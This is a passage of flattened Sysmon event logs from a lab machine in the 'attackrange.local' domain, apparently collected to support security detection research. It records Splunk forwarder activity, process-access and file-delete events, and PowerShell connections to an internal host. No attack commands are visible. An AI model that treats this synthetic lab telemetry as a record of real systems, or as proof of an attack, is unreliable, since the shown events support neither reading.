Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x800000000000000035342727Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:26.517{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52459-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035342726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:26.515{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52458-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:00.681{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA46608AFDDA116729F2F424A89500C1,SHA256=160F0C5C6C6397B98A51EEE0E0995F1869647A00DB534F125D1C03D53854940A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:00.628{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=98D39B430E9B8156AEF1FDF89DB3BA76,SHA256=AA620C1646F95838F11216579861992C8373039A91002A285B616D63238EC3E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342728Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:01.711{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BC3FFC0E6CB4A1C3F9C879382BB6089,SHA256=D6BA120D107B4797CA381EBECC341F978FA70F07A6B7EFEC55DACBA0BF7392B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342730Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:28.161{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52460-false10.0.1.12-8000- 23542300x800000000000000035342729Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:02.727{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BB5F15737FD719AB6C3E92F126235F8,SHA256=717790FE1B5A31DC1C25569980DDB725555E68EB2F00F27BFC3E186F654BC29F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342731Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:03.741{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCF50609566CBAF1C988A99507B0A663,SHA256=E21FE0271A80D062A3CFD60F1021DD70890978105A4838096D01D389AB2682A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.842{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7330-613B-3FB4-03000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.842{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.842{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.842{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.842{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.842{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-7330-613B-3FB4-03000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.842{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7330-613B-3FB4-03000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.827{B81B27B7-7330-613B-3FB4-03000000C801}2616C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.763{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4F5C6ED232642347C1D979FEA1D88C4,SHA256=259C2FF229F350A7E347F026A9473C66FE12EB7977A7DD69A247B4CD3B32FE62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=3C66246EE131D10A50D1B82B423E91ED,SHA256=AE3100F7C32789205381D745649E50E4F2784B8CE26B7A5324799DF63454DBF5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.311{B81B27B7-7330-613B-3EB4-03000000C801}64842776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.141{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7330-613B-3EB4-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.141{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.141{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.141{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342735Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.141{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342734Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.141{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7330-613B-3EB4-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342733Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.141{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7330-613B-3EB4-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342732Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:04.126{B81B27B7-7330-613B-3EB4-03000000C801}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:05.794{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCBF5DF9F96FE433645E5EF9373FE051,SHA256=0EFE12CA808A235394DB22A82FDC0B5D3D1BAB3BA3B9B003ABD7B1EF132A83A3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:05.294{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ED3A782D0BBE4C886336B051716602DE,SHA256=4E44B499784027658E2F71A0D5F478FF94CE0F7F9D4CD0531294550208616CF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:05.294{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8ADFD99D6AB56ABBEE70B0E7FB2DBABF,SHA256=86B900217D0E6EBFEFE5CE5E62C81A7B355D7ECD728D8D7B23BD7D261AA4849D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:30.528{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52461-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:06.809{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D462DD317203C425300D25E7702C08A,SHA256=68C23F1CA2F820F6861F2171F62CA01BD43785E5E122CF6968F131D817B78488,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:07.824{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49E9708DA2DE25326A8DB8C22A7C86E3,SHA256=FE7FD8B0CED0A01D0E1F776EA6AC84A398E0535E9133931553048356B272F942,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:08.856{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C884079052492177E07D372800F73A32,SHA256=FC22306C2C026B51C00F9717F14272427D48298EC3922DE0CA616318119D09CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:33.211{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52462-false10.0.1.12-8000- 23542300x800000000000000035342760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:09.875{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0844220E46FBDF95794B31F5044B75FD,SHA256=D1AF3895E4A2954F61DBFC9DA58132B7018B85389B9686344EEF46968B1931D0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:09.776{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BE8F84AE82F560221BA441AFE59D43C0,SHA256=8D7397E1882E95949737EC72F26871B046C75A322E3292E2E3927A9F15C40536,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:01:10.875{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5479CA0D1B09385055EA819FE8D9C748,SHA256=DC874659D33E90C3007A41C2F4495A07E3FCF4A1FA0C608662EEE037486C1C0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 